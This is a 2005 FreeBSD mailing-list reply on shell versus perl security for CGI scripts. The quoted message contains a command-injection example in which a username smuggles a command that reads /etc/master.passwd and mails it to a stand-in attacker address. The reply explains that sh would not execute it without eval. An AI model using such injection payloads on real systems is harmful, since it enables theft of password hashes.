From owner-freebsd-questions@FreeBSD.ORG  Sat Feb  5 04:13:50 2005
Return-Path: <owner-freebsd-questions@FreeBSD.ORG>
Delivered-To: freebsd-questions@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125])
	by hub.freebsd.org (Postfix) with ESMTP id 6E0AC16A4CE
	for <freebsd-questions@freebsd.org>;
	Sat,  5 Feb 2005 04:13:50 +0000 (GMT)
Received: from dan.emsphone.com (dan.emsphone.com [199.67.51.101])
	by mx1.FreeBSD.org (Postfix) with ESMTP id 0271543D41
	for <freebsd-questions@freebsd.org>;
	Sat,  5 Feb 2005 04:13:50 +0000 (GMT)
	(envelope-from dan@dan.emsphone.com)
Received: (from dan@localhost)
	by dan.emsphone.com (8.13.1/8.13.1) id j154DjoU026898;
	Fri, 4 Feb 2005 22:13:45 -0600 (CST)
	(envelope-from dan)
Date: Fri, 4 Feb 2005 22:13:45 -0600
From: Dan Nelson <dnelson@allantgroup.com>
To: "Loren M. Lang" <lorenl@alzatex.com>
Message-ID: <20050205041344.GK25463@dan.emsphone.com>
References: <ef60af090501242128e57e92d@mail.gmail.com>
	<200501251530.06424.shinjii@virusinfo.rdksupportinc.com>
	<20050125055301.GB16896@xor.obsecurity.org>
	<ef60af0905012500265eb38b66@mail.gmail.com>
	<EB3282A396FFCC78382D2E81@utd49554.utdallas.edu>
	<ef60af090501251100472d6fb6@mail.gmail.com>
	<20050125194736.GD76109@xor.obsecurity.org>
	<ef60af09050125142353301be4@mail.gmail.com>
	<ef60af09050125144166ecaae4@mail.gmail.com>
	<20050205034440.GF8619@alzatex.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20050205034440.GF8619@alzatex.com>
X-OS: FreeBSD 5.3-STABLE
X-message-flag: Outlook Error
User-Agent: Mutt/1.5.6i
cc: Paul Schmehl <pauls@utdallas.edu>
cc: "Donald J. O'Neill" <donaldj1066@fastmail.fm>
cc: Warren <shinjii@virusinfo.rdksupportinc.com>
cc: Gert Cuykens <gert.cuykens@gmail.com>
cc: Kris Kennaway <kris@obsecurity.org>
cc: freebsd-questions@freebsd.org
Subject: Re: perl and ports
X-BeenThere: freebsd-questions@freebsd.org
X-Mailman-Version: 2.1.1
Precedence: list
List-Id: User questions <freebsd-questions.freebsd.org>
List-Unsubscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-questions>,
	<mailto:freebsd-questions-request@freebsd.org?subject=unsubscribe>
List-Archive: <http://lists.freebsd.org/pipermail/freebsd-questions>
List-Post: <mailto:freebsd-questions@freebsd.org>
List-Help: <mailto:freebsd-questions-request@freebsd.org?subject=help>
List-Subscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-questions>,
	<mailto:freebsd-questions-request@freebsd.org?subject=subscribe>
X-List-Received-Date: Sat, 05 Feb 2005 04:13:50 -0000

In the last episode (Feb 04), Loren M. Lang said:
> Actually, I think you should work on sh first, it's a much bigger
> security hazard than perl.  If you've ever written much sh, you'd
> realize with it's much loser syntax, it's easy to get into trouble. 
> At least perl provides use strict and -Tw.  Someone using sh to write
> cgi scripts is the worst.  Imagine someone writing the following like
> for a sh cgi script where $USERNAME is a cgi paramater passed into
> the following script:
> 
> echo "<HTML><HEAD><TITLE>Welcome, " $USERNAME "</TITLE></HEAD>"
> 
> What if someone wrote the following username and apache was running as
> root:
> 
> charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo

Then you would get a web page containing:

<HTML><HEAD><TITLE>Welcome, charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo</TITLE></HEAD>

.  The shell doesn't re-interpret its input unless explicitly told to
via the "eval" command.  /bin/sh is a little limited for more complex
scripts due to its lack of arrays, though, so zsh/ksh/bash are much
better choices :)

-- 
	Dan Nelson
	dnelson@allantgroup.com